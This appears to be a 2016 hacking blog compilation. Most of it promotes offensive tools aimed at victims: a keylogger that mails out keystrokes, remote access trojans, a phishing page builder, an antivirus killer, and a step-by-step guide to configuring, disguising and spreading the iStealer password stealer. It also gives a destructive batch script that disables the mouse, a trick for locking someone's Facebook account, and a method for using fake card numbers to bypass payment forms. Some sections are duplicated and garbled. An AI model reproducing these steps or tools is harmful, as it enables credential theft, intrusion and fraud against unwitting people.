Friday, 22 April 2016

ardamax kwylogger

Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.

Here is tutorial for setup
Tutorial

For Download
Download Here

or

Here

IP anonymizer

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.


Download:

Turkojan gold

Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling  the victim computer in many ways. 

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected. 

Download

Or

Here

Ha**k computer Remotly

PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses a client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect the victim's PC in different ways. Just create the server and send it to the victim. 

Download

Phisher creator

Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account.

Download

OR

Here

TCP dump

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download

wireshark

Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download

SMAC mac addresse changer

SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.

  •     Automatically Activate MAC Address after changing
  •     display the manufacturer of the MAC Address
  •     Generate any New MAC Address based on a selected manufacturer
  •     Preload MAC Addresses List n choose the new MAC address from the list.
  •     IPConfig button click to display network adapter  info to confirm changes
  •     Userfriendly GUI
Download

swiss

Swiss Army Knife is software and program which hav ability to perform  tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.

Download

Or

Here

Av killer

avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security  tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.

Download

Or

Here

Istraler

istealer

This is tutorial specially for that people who are know lil bit about configure a stealers server.

before start we need to sign up a ftp service i recomended this site
http://www.drivehq.com

STEP 1

 Get the staeler from following link 

STEP 2

Run application and extract it
Click on "iStealer".
IF YOU GET ERROR MISSING COMDLG32.OCX 
Downloaded the missing OCX extract it into WINDOWS>SYSTEM32

STEP 3 ( Create server for steal passwords )

 Host copy and paste this "ftp.drivehq.com"
Username enter your drivehq.com username.
Password enter your drivehq.com password.

After this if you want to bind your server(password stealer)
with another application, song, document, picture etc. Click "bind with another file" and chose what file U want 2 bind your server with ... Also you can cahnge icon and thn buildserver. After make compress it and upload and spread where u want

Most harmful viruses



 All of us have heard already about VIRUS , WORMS , TROJANS and SPYWARES but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from Trojans , Worms and Spywares. All can be dangerous for your computers . Today i'll tell about difference them

VIRUS 
 A virus is a self replication program and software which is attached to an executeable  
 files. When file is opened or executed the virus automatically gets executed and enter into system memory .when enters it searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.
Worms
Worms are very similar to viruses but differ in way that they don't bind themselves to executable files instead  to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.
Trojan Horse

A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to  facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.
Spyware
A spyware is a program and software that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.

Here is the list of names of most harmful virus and worms in the history of computers
  •  Storm Worm
  •  Leap-A/Oompa- A
  •  Sasser and Netsky
  •  MyDome (Novarg)
  •  SQL Slammer / Sapphire
  •  Nimda
  •  Code Red and Code Red II
  •  The Klez
  •  ILOVEYOU
  •  Melissa

WiFi security tips


Wifi stands for Wireless Fidelity.
Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured.Their are several loopholes through which your unsecured wireless connection can be easily hacked.So ,In this post you will know how to secure your wifi network with simple steps.



If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you.Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.
 The step by step  guide given below summarize all the necessary steps you should take for securing your wifi network.

  • Change Default Administrator Passwords (and Usernames)
 Whenever you purchase a new moden or new connection then you are required to configure your modem.The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access.By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password,public,admin or some other simple word.So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .
  • Turn on (Compatible) WPA / WEP Encryption
 Most of the modern modems allows both wpa and wep for securing your wifi.Applying these keys will not only encrypt your wifi network connection but it will also apply authentication .So,you should select the strongest encryption to secure your wifi network.
  • Enable MAC Address Filtering
 Mac addresses are also known as  physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed.So,your router can be configured to connect to only to those devices whose MAC address match to the home devices.It will secure your wifi connection by just allowing the home devices to connect to it.
  • Enable Firewalls On Each Computer and the Router
 Most of the modern routers come with a inbuilt firewall capability to secure your wifi network.Make sure that your router firewall is turned on if your router has one.On the other hand you can also use firewall in your computers.They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.
  • Position the Router or Access Point Safely
A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router.Never place your router near windows instead try to place it in the center of the house.You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.
  • Turn Off the Network During Extended Periods of Non-Use
 Turn of the router when it is not used.It will secure your wifi connection by giving out less access  time to hackers to your wifi network and it will be difficult for them to hack in short period of time.Moreover it will be saving your electricity which will be a secondary advantage for you.

Make a virus to disable mouse

Make a virus to disable mouse
  
  • Open Notepad and copy below codes

rem ---------------------------------
 rem Disable Mouse
 set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
 reg delete %key%
 reg add %key% /v Start /t REG_DWORD /d 4

 rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.

Saturday, 16 April 2016

How To Disable , Destroy , Crash Someone Facebook Id

How To Disable , Destroy , Crash Someone Facebook Id

How To Disable , Destroy , Crash Someone Facebook Id

ThIS is VerY simple And 101% Working Trick

http://34255353309

Just Ask Your Vicitm or Friend To Copy This Link And Comment It to his profile picture


If victim do this his id was temporary locked And Asking Photo Verification

It's 100% Working Method.

Charge Your Smartphone 25% faster

Enable Airplane Mode While You Charge

The secret to charging your smartphone up to 25% faster is simple—just enable Airplane Mode while you charge. This works because it turns off battery-draining connectivity radios and lets your phone focus on charging and charging alone.

https://www.facebook.com/notifications.php?refid=17

Cs documentries

Top documentaries on computer.


The Signal http://www.imdb.com/title/tt2910814/ 2014
BlackHat http://www.imdb.com/title/tt2717822/ 2015
The Score http://www.imdb.com/title/tt0227445/ 2001
Anti-Trust http://www.imdb.com/title/tt0218817/ 2001
The Matrix http://www.imdb.com/title/tt0133093/ 1999
The Lawnmower Man http://www.imdb.com/title/tt0104692/ 1992
Fool Proof http://www.imdb.com/title/tt0356614/ 2003
Sneakers http://www.imdb.com/title/tt0105435/ 1992
GoldenEye http://www.imdb.com/title/tt0113189/ 1995
Untraceable http://www.imdb.com/title/tt0880578/ 2008
Disclosure http://www.imdb.com/title/tt0109635/ 1994
Mission: Impossible - Ghost Protocolhttp://www.imdb.com/title/tt12292382011

Top 10 movies based on hacking.



In recent years, Hollywood has taken a shine to hackers, with hackers appearing in almost every heist or mystery movie now. This can be both good and bad for our profession. As we know, whichever way Hollywood decides to depict our profession is how most people will perceive it.
The good news is that not all of Hollywood's depictions of hackers are negative, despite the overwhelming perception by the masses that our profession is a malicious one.
In trying to determine the ten best hacker movies, I tried to only use those films where people are actually entering into other peoples' or organizations' computers for good or ill. Very often, reviewers of this genre include any movie with computer "stuff" as a "hacker movie." In my definition of a hacker movie, someone must be using advanced skills to access someone else's computer, without their consent or knowledge, for good or ill.
In addition, I evaluated the movies based upon plot, acting, directing and, most importantly, how they portrayed hackers. They got extra points if they portrayed the hackers as the "good guys," have female hackers in opposition to the male geek archetype, and even more points if the hacking represents something close to reality.

#10. Takedown

Takedown (also known as Trackdown) is a B-grade movie—a fictionalized and sensationalized account of the tracking and capture of probably the most infamous U.S. hacker, Kevin Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and '90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.
This movie has low production values, despite having some relatively well-known actors (Skeet Ulrich, Tom Berenger, and Amanda Peet, among others). Don't expect to learn much hacking from this movie, though, as nearly the entire 1 hour and 36 minutes is a story about tracking down Kevin Mitnick as the FBI and Shimomura searches for him across the states.

#9. Swordfish

In Swordfish, Hugh Jackman plays a retired, elite hacker who has been released from a long prison term and is now working in the oil fields and living in a trailer. He is approached by an organized crime figure played by John Travolta, and is forced to do one last hacking job against his will.
Unfortunately, the hacking is forgettable and far from reality. Jackman's character is seen breaking into highly secure systems within seconds, while gyrating geometric objects appear on his screen. Very little depiction of the actual hard work that goes into hacking is seen, and they make it look like a computer game.
The most memorable part of this movie is Halle Berry's topless scene. Although it has nothing to do with hacking, it does make this movie memorable.

#8. The Italian Job

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible. Could this hacker have been using Shodan to identify and assist in hacking these devices?
Although not true to the detail, it does portray hacking with some realism. I really like the concept that ALL digital devices are susceptible to hacking, not just computer systems.

#7. The Fifth Estate

The Fifth Estate is an unauthorized account of Julian Assange and WikiLeaks. Cumberbatch plays a believable Assange as a egotistical, idealist that is out to change the world. Few Americans know that Assange is a famous (or infamous) hacker in his native country of Australia. He broke into the Pentagon, Citibank, NASA, and Stanford University, among other facilities, before being caught.
WikiLeaks was founded to provide a safe place for whistleblowers to make secret state information available to the world when that information reveals the ill deeds of powerful governments. They were responsible for the leaks regarding U.S. military abuses in Iraq and Afghanistan, as well as in other places.
Although little hacking takes place in this movie, it is an important film for the hacking community as it depicts how hacking can potentially change the world history, as I'm sure it will.

#6. Ghost in the Shell

Ghost in the Shell is a classic Japanese anime film that depicts a future (probably mid-21st century) where humans are part flesh and blood and part bionic. Many people have cyber brains that are part electronic and part grey matter. This cyber brain enhances their cognitive abilities and allows them to plug into larger networks. This is an intriguing concept that is likely to become reality in the very near future.
The story is about a special operations task force that is part-police and part-military. The lead character is female officer whose body was destroyed as young girl and has been replaced by a beautiful bionic body. The hacking in this futuristic tale is the even more malicious variety of hacking, the hacking of the human mind.


#5. Sneakers

In Sneakers, Robert Redford and Ben Kingsley portray two young hackers whose lives take two different directions after their playful hacking leads to the arrest of Kingsley's character. They meet again some thirty years later when one (Kingsley) is working for the bad guys and the other (Redford) isn't sure who he's working for when he's forced to comply upon threat of his true identity being revealed.
The plot revolves around a new encryption algorithm that would make electronic communication secure. The NSA plays the bad guys who want the encryption algorithm so that they can spy on everyone. The movie was ahead of its time in that respect.

#4. Live Free or Die Hard

The fourth installment in the Die Hard series, Live Free or Die Hard, depicts a scenario where a hacker played by Timothy Olyphant (of Justified fame) takes down nearly the entire U.S. infrastructure in an attempt to transfer trillions of dollars from the Federal Reserve to his account.
As I believe this type of infrastructure hack is one of the most important issues in national security, it gets kudos from me. Watching Bruce Willis ride outside of a Harrier Jump Jet to take down the bad guys is simply laughable, though. Another notable moment in this movie is the portrayal by Justin Long as the good guy hacker employed by Willis' cop character to assist in stopping the bad guys. You probably remember him from the iconic "Mac vs. PC" ads.

#3. WarGames

This classic 1983 hacker move WarGames depicts a young teenage bedroom hacker played by Matthew Broderick who almost starts World War III. By war-dialing, he is able to get unencumbered access to the Department of Defense's nuclear missile launch controls.
The hacker is portrayed as a playful, rather than malicious, and knowledgeable teenager who inadvertently hacks into critical DoD systems.

#2. The Girl with the Dragon Tattoo

Noomi Rapace portrays The Girl with with Dragon Tattoo (I prefer the original Swedish version to the Hollywood version) superbly. She is a young woman, recently released from prison for a crime of passion in her youth. She has been traumatized by the corrections and probation system and is probably showing signs of mild autism. As a way of earning an income, she works as hacker for hire for a private investigator. This leads her into the path of Mikael, a middle-aged investigative writer who is being unfairly persecuted by a diabolical wealthy industrialist.
Her hacking is critical to revealing the identity of the true evil-doer. Although the hacking is oversimplified, it is far more realistic than most films, even if she is using a Mac. She works from a command line terminal and there are scenes showing the Unix/Linux file structure.

#1. Hackers

In Hackers, Angelina Jolie and Johnny Lee Miller (they were married after the making of this movie) portray two youthful and hip hackers. Miller (now of the Sherlock Holmes TV spinoff, Elementary) portrays a hacker who got caught as a very young child (11) after crashing thousands of computers and has been sentenced to zero computer access until his 18th birthday.
The hacking is relatively realistic, although a bit dated. The film was made in 1993, but the technology looks to be mid- to late-1980s. It gets points for portraying hackers as the good guys (thwarting the plans of the evil corporation) and as hip, rather than nerds.
What do think? Did I miss any great hacking flicks?

How to get free trials of credit cards.





When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.
In order to avoid that rigmarole, you can actually use fake credit numbers instead of your own, and you can do that using the sitegetcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.
Now, to be completely clear, these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16 digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work?

The credit card number generator uses a system based off of the Luhn Algorithm, which has been used to validate numbers for decades.A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade.
For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, getunlimited free trials on those sites using a simple trick with your email address if you have a valid card number with expiration date and CSV.

Getting a Card Number on Android

There's also an AndroidWhen I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.
In order to avoid that rigmarole, you can actually use fake credit numbers instead of your own, and you can do that using the sitegetcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.
Now, to be completely clear, these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16 digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work?

The credit card number generator uses a system based off of the Luhn Algorithm, which has been used to validate numbers for decades.A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade
For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, getunlimited free trials on those sites using a simple trick with your email address if you have a valid card number with expiration date and CSV.

Getting a Card Number on Android

There's also an Android application for getting fake card numbers calledCardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.
Don't forget to like on Facebook zeroint


The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.
 application for getting fake card numbers calledCardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.


The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.